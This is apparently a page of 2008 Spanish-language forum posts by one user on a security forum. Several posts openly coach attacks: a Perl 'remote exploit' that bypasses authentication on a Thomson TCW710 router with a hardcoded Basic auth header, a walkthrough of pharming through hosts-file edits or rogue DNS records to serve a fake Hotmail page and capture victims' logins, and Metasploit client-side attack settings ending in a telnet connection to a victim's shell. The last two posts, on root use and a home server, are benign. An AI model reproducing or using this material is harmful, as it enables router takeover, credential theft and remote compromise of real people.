| |
|
91
|
Seguridad Informática / Bugs y Exploits / Re: BugS en TCW710?
|
en: 25 Agosto 2008, 10:43
|
@Stacker Ha vaya lei mal XDD, intenta comentar esa linea y ejecuta el exploit platicanos que pasa en el router y con el propio exploit, seguramente tendremos que hacer algunas modificaciones para mejorarlo. Si no tienes perl para probar, bajatelo para win32 link: :http://downloads.activestate.com/ActivePerl/Windows/5.10/ActivePerl-5.10.0.1003-MSWin32-x86-285500.msi Linux, esta por default. Ejecutar win32 o Linux: perl -x exploit_TCW710.pl
Ya nos platicaras. -berz3k. |
|
|
|
|
93
|
Seguridad Informática / Hacking Avanzado / Re: despues de averiguar contraseña routuer
|
en: 25 Agosto 2008, 08:35
|
El "pharming" como ya es conocido, puede ser una opcion para que la victima se conecte a una pagina "fake" y que basicamente es modifcar el archivo "host" de la propia victtima e.g: La ruta exacta en Win32 XP seria: C:\WINDOWS\system32\drivers\etc\hosts
Notepad o Wordpad # Copyright (c) 1993-1999 Microsoft Corp.
# etc
# etc
# etc
127.0.0.1 localhost
192.0.0.10 www.google.com # <-IP con pagina falsa de Google.
Por lo que veo el "pharming" se haria de otra forma: Ya que somos el "Server DNS", la victima podra navegar y resolver dominios hacia internet, pero tambien los "records" que agreguemos en nuestro propio "Server DNS". Bien ahora el poner en escucha una pagina, no creo que implique modificar nuestros propio archivo HOST, si agregamos un "record" sera mas que suficiente para que la victima entre e.g Nuevo Record 192.0.0.10 www.hotmail.comCuando la victima trate de entrar ah hotmail.com vera nustra "fake" page, tratara de loguearse y obtendremos su login y pass, esto tambien implicaria algo de programacion Java, PHP o HTML para que sea lo mas real posible. Conozco diferentes caminos para explotar "side client" , pero hablando de metasploit seguramente te funcionara los Real Player, Winamp, Firefox etc, te pedira la siguientes opciones clasicas para atacar "side client" agregare un ejemplo: SRVHOST=192.0.0.20 <-IP atacante es decir tu
SRVPORT=8080 <- Puerto en escucha, estara por default el 8080.
LPORT=4444 <- Puerto que escuchara la victima.
Una vez que la victma se haya conectado a la IP 192.0.0.20, y tenga instalado cualquiera de los exploits comunes de Metasploit .eg. IE, Winamp, Real Player etc, automaticamente sera explotado (si no tiene parches o firewall mal configurado), tendras acceso a su unidad o PC remotamente, es decir c:\ , simplemente: telnet ip.victima 4444
-berz3k. |
|
|
|
|
95
|
Seguridad Informática / Bugs y Exploits / Re: BugS en TCW710?
|
en: 22 Agosto 2008, 01:26
|
Vaya, no tengo la oportunidad de probarlo en mi LAB, espero me presten alguno para hacer algunas pruebas, si todo marcha como dices, me adelanto a crear un pequeño exploit remoto, version beta, habra que comprobar algunas otra cosas y sacarle el mayor provecho: #!/usr/bin/perl -w
#
# Router WiFi Thomson TCW710
# Remote Exploit bypass Authentication via "POST"
#
# By berz3k [berz3k at gmail.com]
use strict;
use LWP;
use Data::Dumper;
require HTTP::Request;
require HTTP::Headers;
my $method = 'POST'; # Method "GET" or "POST"
my $uri = '192.168.0.1'; # Factory default IP address
my $content = "/goform/RgForwarding?"; # Variable to send
my $headers = HTTP::Headers->new(
'Host:' => '192.168.0.1',
'User-Agent:' => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6 Paros/3.2.13',
'Accept:' => 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5',
'Accept-Language:' => 'en-us,en;q=0.5',
'Accept-Charset:' => 'ISO-8859-1,utf-8;q=0.7,*;q=0.7',
'Keep-Alive:' => '300',
'Connection:' => 'keep-alive',
'Referer:' => 'http://192.168.0.1',
'Authorization:' => 'Basic OmFkbWlu', # base64 encode
'Content-Length:' => '1159',
);
my $request = HTTP::Request->new($method, $uri, $headers, $content);
my $ua = LWP::UserAgent->new;
my $response = $ua->request($request);
print "[+] Remote Exploit for TCW710 Beta\n";
print "[+] Coded by: berz3k [berz3k\@gmail.com]\n";
print "[+] We got this response from router: \n\n" . $response->content . "\n";
my $data;
foreach my $pair (split('&', $response->content)) {
my ($k, $v) = split('=', $pair);
$data->{$k} = $v;
}
if ($data->{RESULT} != 0) {
print "[+] Remote Exploit for TCW710 Beta\n";
print "[+] Coded by: berz3k [berz3k\@gmail.com]\n";
print "[+] Use:\n";
print "\tperl -x exploit_TCW710.pl\n";
print $data->{RESPMSG} . "\n";
exit(0);
} else {
print "[+] Remote Exploit for TCW710 Beta\n";
print "[+] By berz3k [berz3k\@gmail.com]\n";
}
|
|
|
|
|
98
|
Sistemas Operativos / GNU/Linux / Re: ser Root? o usuario comun?
|
en: 21 Agosto 2008, 10:02
|
|
Yo no tengo pacienciencia de esta tecleando pass de root cada vez que utlizo programas , debuggin etc, claro; si eres de los que sigue las "Best Practices User Linux", siempre recomendaran que crees un usuario mortal.
sencillo:
Usuario Normal (crear usuario sin prvilegios)
Usuario Intermedio (usuario con privilegios y/o uso de root)
Usuario Avanzado (uso de root en todas las expresiones)
-berz3k.
PD: Yo uso root en todos los casos, tanto en Windows XP, Vista y win2k, como en Linux y OSX, solo cuando navego me convierto en user mortal bajos privilegios y protecciones TODAS.
|
|
|
|
|
99
|
Comunicaciones / Redes / Re: Crear un server casero
|
en: 21 Agosto 2008, 09:54
|
|
Lo primero que me se ocurre para esas caracteristicas que nos posteas, es instalarle un pequeño Linux sencillo como debian, agregarlo como proxy para que puedan conectarse las demas PCs.
-berz3k.
:http://debian.org
|
|
|
|
|
|
| |
|
Mostrar Mensajes
